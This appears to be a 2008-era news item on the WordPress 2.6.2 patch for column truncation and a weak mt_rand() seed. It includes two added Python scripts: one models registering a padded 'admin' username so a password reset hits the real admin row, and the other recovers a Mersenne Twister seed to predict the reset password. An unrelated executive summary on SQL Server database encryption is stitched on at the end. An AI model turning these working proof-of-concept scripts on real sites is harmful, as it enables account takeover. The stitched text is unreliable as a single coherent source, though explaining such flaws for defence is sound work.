WordPress shuts door on new PHP attack vector

The patching hamster wheel keeps on rolling and rolling.

According to an advisory from the maintainers of the open-source blog software, WordPress 2.6.2 was released on September 8 to mitigate a new attack vector discovered by PHP security guru Stefan Esser.

From the announcement:

“Stefan Esser recently warned developers of the dangers of Column Truncation and the weakness of mt_rand(). With his help we worked around these problems and are now releasing 2.6.2. If you allow open registration on your blog, you should definitely upgrade. With open registration enabled, it is possible in versions 2.6.1 and earlier to craft a username such that it will allow resetting another user’s password to a randomly generated password. The randomly generated password is not disclosed to the attacker, so this problem by itself is annoying but not a security exploit. However, this attack coupled with a weakness in the random number seeding in mt_rand() could be used to predict the randomly generated password.”
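How the crafted username slips past the uniqueness check and why a later reset touches the victim's row, as an added example that is not WordPress or MySQL code. It models two documented MySQL behaviours in plain Python: with strict mode off, an over-long value is silently truncated on INSERT, and under a PAD SPACE collation `=` ignores trailing spaces. The column width (60), the flow shape and all users and addresses are assumptions constructed for the example.

```python
# Added example: a Python model of the column-truncation step. It is not
# WordPress code; it reproduces two documented MySQL behaviours by hand.
#
# Assumptions (labelled): the login column is VARCHAR(60); the server runs
# MySQL without STRICT mode, so an over-long value is silently cut to 60
# characters on INSERT; the column uses a PAD SPACE collation, so '='
# ignores trailing spaces. All users and e-mail addresses are constructed.

USER_LOGIN_LEN = 60  # width of the (assumed) VARCHAR column


def mysql_equal(a: str, b: str) -> bool:
    """'=' under a PAD SPACE collation: trailing spaces are not significant."""
    return a.rstrip(" ") == b.rstrip(" ")


def mysql_insert(value: str, width: int = USER_LOGIN_LEN) -> str:
    """Non-strict INSERT: the stored value is the input cut to the column width."""
    return value[:width]


def vulnerable_register(users: list, login: str, email: str) -> bool:
    """2.6.1-style flow: uniqueness check on the raw input, then a truncating INSERT."""
    if any(mysql_equal(u["login"], login) for u in users):
        return False  # "username already exists"
    users.append({"login": mysql_insert(login), "email": email})
    return True


def hardened_register(users: list, login: str, email: str) -> bool:
    """Accept only logins that survive storage unchanged and cannot alias another row."""
    if login != login.strip() or " " in login or not login.isprintable():
        return False
    if not login or len(login) > USER_LOGIN_LEN:
        return False
    if any(mysql_equal(u["login"], login) for u in users):
        return False
    users.append({"login": login, "email": email})
    return True


def reset_targets(users: list, requester_email: str) -> list:
    """Rows hit by a reset: the flow finds the requester by e-mail, then uses
    the *stored* login in `WHERE user_login = ?`, which under PAD SPACE also
    matches the victim's row."""
    row = next(u for u in users if u["email"] == requester_email)
    return [u["email"] for u in users if mysql_equal(u["login"], row["login"])]


def demo() -> tuple:
    users = [{"login": "admin", "email": "admin@example.org"}]
    crafted = "admin" + " " * 55 + "x"  # 61 chars: differs from "admin" until stored
    registered = vulnerable_register(users, crafted, "attacker@example.net")
    targets = reset_targets(users, "attacker@example.net")
    blocked = not hardened_register([{"login": "admin", "email": "admin@example.org"}],
                                    crafted, "attacker@example.net")
    return registered, targets, blocked


if __name__ == "__main__":
    print(demo())
```

The trailing `x` is what defeats the existence check: it makes the raw input compare unequal to `admin`, and the INSERT then discards it. The hardened variant rejects anything that would not round-trip through the column unchanged; enabling MySQL strict mode (so the INSERT fails instead of truncating) is the complementary server-side control.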

WordPress developers said the attack is difficult to accomplish but, given the associated risk, released the patch anyway.

It’s important to note that WordPress is not alone: any PHP application that checks a username for uniqueness before inserting it into a length-limited column, or that derives passwords or reset tokens from mt_rand(), is exposed to the same class of attack.
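Why the mt_rand() half of the chain matters, as an added example that is not WordPress or PHP source. A seeded Mersenne Twister is fully determined by its seed, so an attacker who sees one output from the same worker process and can enumerate the seed space replays the generator and reads off the "random" password. The code below assumes reference MT19937 seeded as PHP's mt_srand() seeds it (PHP 5's mt_rand() had a small deviation from the reference twist that is not reproduced), PHP 5's 31-bit output and range scaling, a wp_generate_password()-style loop over an assumed 62-character alphabet, and a worker seeded from a request timestamp, a constructed and deliberately weak seed standing in for the real one.

```python
# Added example, not WordPress or PHP source: shows why a predictable
# mt_rand() seed turns "reset another user's password to a random value"
# into "know that value".
#
# Assumptions (labelled): reference MT19937 seeded the way PHP's mt_srand()
# seeds it (init_genrand); PHP 5's mt_rand() had a small deviation from the
# reference twist that is not reproduced here. mt_rand() returns the upper
# 31 bits of each output and mt_rand(min, max) scales that value PHP 5 style.
# The password loop mirrors a wp_generate_password()-style loop over a
# 62-character alphabet (the exact alphabet is an assumption). The worker
# seeds from a request timestamp: a constructed, deliberately weak seed.
from typing import Iterable, Optional, Tuple


class MT19937:
    """Minimal reference Mersenne Twister with 32-bit outputs."""
    N, M = 624, 397

    def __init__(self, seed: int):
        self.mt = [0] * self.N
        self.mt[0] = seed & 0xFFFFFFFF
        for i in range(1, self.N):  # init_genrand
            prev = self.mt[i - 1]
            self.mt[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF
        self.index = self.N

    def _twist(self) -> None:
        mt, N, M = self.mt, self.N, self.M
        for i in range(N):
            y = (mt[i] & 0x80000000) | (mt[(i + 1) % N] & 0x7FFFFFFF)
            mt[i] = mt[(i + M) % N] ^ (y >> 1) ^ (0x9908B0DF if y & 1 else 0)
        self.index = 0

    def next_u32(self) -> int:
        if self.index >= self.N:
            self._twist()
        y = self.mt[self.index]
        self.index += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & 0xFFFFFFFF


MT_RAND_MAX = 0x7FFFFFFF
ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"


def mt_rand(rng: MT19937, lo: int, hi: int) -> int:
    """PHP 5 style mt_rand(min, max): 31-bit output scaled into [lo, hi]."""
    n = rng.next_u32() >> 1
    return lo + int((hi - lo + 1.0) * (n / (MT_RAND_MAX + 1.0)))


def generate_password(rng: MT19937, length: int = 12) -> str:
    """wp_generate_password()-style loop: one mt_rand() call per character."""
    return "".join(ALPHABET[mt_rand(rng, 0, len(ALPHABET) - 1)] for _ in range(length))


def worker(seed: int) -> Tuple[int, str]:
    """One PHP worker process: emits a value the attacker can see (a nonce in
    a page, say), then draws the victim's new password from the same state."""
    rng = MT19937(seed)
    visible = mt_rand(rng, 0, MT_RAND_MAX)
    return visible, generate_password(rng)


def recover_seed(visible: int, candidates: Iterable[int]) -> Optional[int]:
    """Find the seed whose first mt_rand() output matches the observed value."""
    for seed in candidates:
        if mt_rand(MT19937(seed), 0, MT_RAND_MAX) == visible:
            return seed
    return None


def predict_password(visible: int, candidates: Iterable[int]) -> Optional[str]:
    """Replay the generator past the observed output to the password draws."""
    seed = recover_seed(visible, candidates)
    if seed is None:
        return None
    rng = MT19937(seed)
    mt_rand(rng, 0, MT_RAND_MAX)  # consume the output we already observed
    return generate_password(rng)


if __name__ == "__main__":
    # Constructed scenario: the attacker knows the worker was seeded within
    # the previous five minutes of the observed request.
    seed_time = 1220832000
    visible, real_password = worker(seed_time)
    guess = predict_password(visible, range(seed_time - 300, seed_time + 1))
    print(guess == real_password, guess)
```

The five-minute window only keeps the search fast in Python; a full 32-bit seed space is small enough to enumerate offline in a compiled language, so narrowing the seed is not the attacker's hard part. The fix on the application side is not a better seed but a different source: passwords and reset tokens should come from a CSPRNG (PHP 7's random_bytes(), or openssl_random_pseudo_bytes() on older releases), never from mt_rand().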



Database Encryption Solutions

Executive Summary: Database encryption can protect data on Microsoft SQL Server and other database platforms from internal and external attacks. Although SQL Server 2008 and SQL Server 2005 have built-in encryption features, best practice for implementing security solutions involves a layered approach that also incorporates third-party products. Database encryption products generally encrypt at the column level or the file level. Key-splitting support, key storage, and the ciphers used can be important factors in choosing the right solution for your environment.

Given recent well-publicized data leaks and beefed-up security regulations that require companies to publicly disclose when unencrypted data has been exposed, all companies not using database encryption should be asking themselves why not. At the simplest level, database encryption addresses the concern that an attacker might get through your network’s other defenses, or that the attacker might be someone from inside the organization. Encrypting data helps keep your company’s name from appearing in the headlines next to disturbing phrases such as “security breach.”

